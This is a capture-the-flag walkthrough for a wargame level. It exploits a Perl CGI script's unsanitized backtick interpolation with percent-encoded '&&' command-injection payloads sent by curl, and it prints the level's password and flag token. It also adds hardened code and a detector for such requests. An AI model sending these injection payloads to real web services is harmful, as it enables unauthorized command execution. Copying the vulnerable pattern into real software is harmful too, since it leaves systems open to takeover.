# Level 04

## How to log in

username: level04

password: qi0maab88jeaj46qoumi7maus

## Goal

Run getflag as user flag04.

## Actually doing something

```
level04@SnowCrash:~$ ll
total 16
dr-xr-x---+ 1 level04 level04  120 Mar  5  2016 ./
d--x--x--x  1 root    users    340 Aug 30  2015 ../
-r-x------  1 level04 level04  220 Apr  3  2012 .bash_logout*
-r-x------  1 level04 level04 3518 Aug 30  2015 .bashrc*
-rwsr-sr-x  1 flag04  level04  152 Mar  5  2016 level04.pl*
-r-x------  1 level04 level04  675 Apr  3  2012 .profile*
```

Hmmm, .pl. Let's dig out the dinosaur and have fun with some Perl.

```perl
#!/usr/bin/perl
# localhost:4747
use CGI qw{param};
print "Content-type: text/html\n\n";
sub x {
  $y = $_[0];
  # the query parameter is interpolated, unsanitized, into a shell command string
  print `echo $y 2>&1`;
}
x(param("x"));
```

This reeks of exploit.

As I understand it, this script is run by the HTTP server on localhost:4747: on each request it takes the query parameter x and returns it.

The issue is how it returns it...

It interpolates the parameter into a shell command string (the backticks) and prints the result. This is as secure as having an endpoint that literally takes a command and returns its output.

Why? Because the data is passed as is, without any form of sanitization, so if we have any way of "leaving" the echo command we can run whatever we want.

For example, getflag.

We want this

```perl
print `echo $y 2>&1`
```

to become

```perl
print `echo idk && getflag 2>&1`
```

We are in a shell, so we can drop the spaces around the &&, meaning that x must be equal to idk&&getflag.

But if we do it naively, nothing happens:

```
level04@SnowCrash:~$ curl 'localhost:4747?x=idk&&getflag'
idk
```

Why?

Because & has a special meaning in URLs: it separates query arguments. We need to escape it.

How?

The standard says to use percent-encoding. Reading a bit more, it says that %26 is the escape code for &.

Let's replace it to get idk%26%26getflag, and voilà!

```
level04@SnowCrash:~$ curl 'localhost:4747?x=GetExploited%26%26getflag'
GetExploited
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
```
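For the other side of the story, here is the same script's shape beside a version that never hands the parameter to a shell, plus a log-review helper that percent-decodes a query value (so %26%26 reads as &&) before checking it for shell metacharacters. This is an added example, not the challenge's level04.pl; the function names and the constructed inputs are mine, and `id` stands in for getflag, which only exists inside the VM.

```perl
#!/usr/bin/perl
# Added example, not the level04.pl from the challenge: the vulnerable pattern,
# a hardened version that never hands user input to a shell, and a log-review
# helper that decodes %26-style escapes before looking for shell metacharacters.
use strict;
use warnings;

# Vulnerable (same shape as the level): the parameter is interpolated into a
# shell command string, so && ; | and backticks in $y are interpreted by /bin/sh.
sub echo_vulnerable {
    my ($y) = @_;
    return `echo $y 2>&1`;
}

# Fix 1: run the program with a list, not a string. Perl then exec()s /bin/echo
# directly; no shell sees the argument, so "idk&&getflag" is one literal word.
sub echo_no_shell {
    my ($y) = @_;
    open(my $fh, '-|', '/bin/echo', $y) or return "echo failed: $!\n";
    my $out = do { local $/; <$fh> };
    close $fh;
    return $out;
}

# Fix 2 (defence in depth): allowlist the parameter. Rejecting everything that
# is not a plain word is easier to get right than blocklisting metacharacters.
sub is_safe_param {
    my ($y) = @_;
    return defined $y && $y =~ /\A[A-Za-z0-9_ .-]{1,64}\z/ ? 1 : 0;
}

# Log review: percent-decode a query value (%26 -> &) and report whether it
# carries shell metacharacters, which is what the write-up's requests look like.
sub suspicious_query_value {
    my ($raw) = @_;
    (my $decoded = $raw) =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $decoded =~ /[&;|`\$<>]/ ? 1 : 0;
}

# Constructed inputs: a benign value and the injection string from the write-up
# (with "id" standing in for getflag, which only exists inside the VM).
for my $input ('hello', 'idk&&id') {
    printf "%-10s allowlisted=%d no_shell=%s", $input,
        is_safe_param($input), echo_no_shell($input);
}
for my $raw ('hello', 'idk%26%26getflag') {
    printf "%-20s suspicious=%d\n", $raw, suspicious_query_value($raw);
}
```

The list form of `open` is what stops the injection on its own; the allowlist and the log check are there so that a request like the ones above is both rejected and noticed.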

Let's have a bit more fun. Since we have access to the machine itself, we can create a file somewhere and run it by giving its path:

```
level04@SnowCrash:~$ curl 'localhost:4747?x=idk%26%26/tmp/path/echo'
idk
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
```

Look mom, I recycle my stuff!